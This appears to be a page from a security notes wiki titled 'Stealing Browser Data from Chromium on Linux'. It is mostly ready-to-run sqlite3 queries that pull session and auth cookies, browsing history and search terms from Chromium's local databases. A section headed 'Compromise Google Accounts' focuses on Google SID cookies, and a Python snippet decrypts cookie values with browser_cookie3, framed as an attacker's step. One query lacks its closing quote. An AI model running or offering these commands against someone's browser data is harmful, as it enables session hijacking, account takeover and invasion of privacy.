Page cover
Edit

Stealing Browser Data from Chromium on Linux

Chromium store cookies in SQLite database files, not plain text. To view them from the terminal, use the sqlite3 command

Locate the databases
find ~/.config/chromium \( -name "Cookies" -o -name "History" \)
Cookies

Key columns

  • host_key: Domain

  • name: Cookie name (e.g., SID for session ID).

  • encrypted_value: Encrypted cookie value.

  • path: URL path where the cookie applies.

  • expires_utc: Expiration timestamp (microseconds since Windows epoch: Jan 1, 1601).

  • is_secure: 1 if HTTPS-only

  • is_httponly: 1 if inaccessible to JavaScript.

Values are AES-GCM encrypted via OSCrypt

Top 10 website with highest number of cookies
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, COUNT(*) as count FROM cookies GROUP BY host_key ORDER BY count DESC LIMIT 10;"
Find cookies that are set to stay in the computer for years
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime((expires_utc/1000000 - 11644473600), 'unixepoch', 'localtime') as expiration_date FROM cookies WHERE expires_utc > 0 ORDER BY expires_utc DESC LIMIT 20;"
Cookies with signed-in state
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, path, is_secure, is_httponly FROM cookies WHERE name LIKE '%SID%' OR name LIKE '%auth%' OR name LIKE '%session%';"
Find cookies that are marked as "Secure: NO". These cookies can be intercepted over Wi-Fi if you are on an open network:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, is_secure, is_httponly
FROM cookies
WHERE is_secure = 0
ORDER BY host_key
LIMIT 20;
Find the cookies that have been accessed most recently:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime(last_access_utc/1000000, 'unixepoch') as last_seen
FROM cookies
ORDER BY last_access_utc DESC
LIMIT 20;"
Lists the cookies with the latest expiration dates to identify persistent tracking cookies:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, datetime((expires_utc / 1000000 - 11644473600), 'unixepoch', 'localtime') as expiry_date FROM cookies WHERE expires_utc > 0 ORDER BY expires_utc DESC LIMIT 10;"
Filter by Domain (e.g., Google):
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, path, expires_utc, is_secure, is_httponly FROM cookies WHERE host_key LIKE '%google.com%' LIMIT 20;"
Search History
Top Sites
sqlite3 ~/.config/chromium/Default/History "SELECT url, title, visit_count, datetime(last_visit_time/1000000 - 11644473600, 'unixepoch', 'localtime') as last_seen FROM urls ORDER BY visit_count DESC LIMIT 20;"
Omnibox searches
sqlite3 ~/.config/chromium/Default/History "SELECT k.term, datetime(u.last_visit_time/1000000 - 11644473600, 'unixepoch', 'localtime') as time_searched FROM keyword_search_terms k JOIN urls u ON k.url_id = u.id ORDER BY u.last_visit_time DESC LIMIT 20;"
Last 20 Google Searches
sqlite3 ~/.config/chromium/Default/History "SELECT datetime(visits.visit_time / 1000000 - 11644473600, 'unixepoch', 'localtime') AS time, urls.url FROM visits JOIN urls ON visits.url = urls.id WHERE urls.url LIKE '%google.com/search?q=%' ORDER BY visits.visit_time DESC LIMIT 20;"
Recent Activity Log
sqlite3 ~/.config/chromium/Default/History "SELECT datetime(visits.visit_time / 1000000 - 11644473600, 'unixepoch', 'localtime') as time, substr(urls.url, 1, 60) as url, urls.title FROM visits JOIN urls ON visits.url = urls.id ORDER BY visits.visit_time DESC LIMIT 50;"
Compromise Google Accounts
Query all Google subdomains:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, COUNT(*) FROM cookies WHERE host_key LIKE '%google.com%' GROUP BY host_key;"
Check Security Flags:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT name, is_secure, is_httponly FROM cookies WHERE host_key LIKE '%google.com%' AND name LIKE '%SID%';"
Correlate with Expirations:
sqlite3 ~/.config/chromium/Default/Cookies "SELECT host_key, name, (expires_utc / 1000000 - 11644473600) as unix_expiry FROM cookies WHERE host_key LIKE '%google.com%' AND expires_utc > 0;" | while read line; do echo "$line" | awk '{print $1 " " $2 " expires: " strftime("%Y-%m-%d %H:%M:%S", $3)}'; done

Decrypt Values

On Linux, values use your keyring. An attacker with your session could use Python libs like browser_cookie3:
import browser_cookie3
cookies = browser_cookie3.chrome(domain_name='.google.com')
for c in cookies: print(c.name, c.value)  # e.g., SID: AQAAA...
Export for Analysis:
sqlite3 -header -csv ~/.config/chromium/Default/Cookies "SELECT * FROM cookies WHERE host_key LIKE '%google.com%';" > ~/audits/google_cookies.csv
PreviousMetasploitNextC Fundamentals

Last updated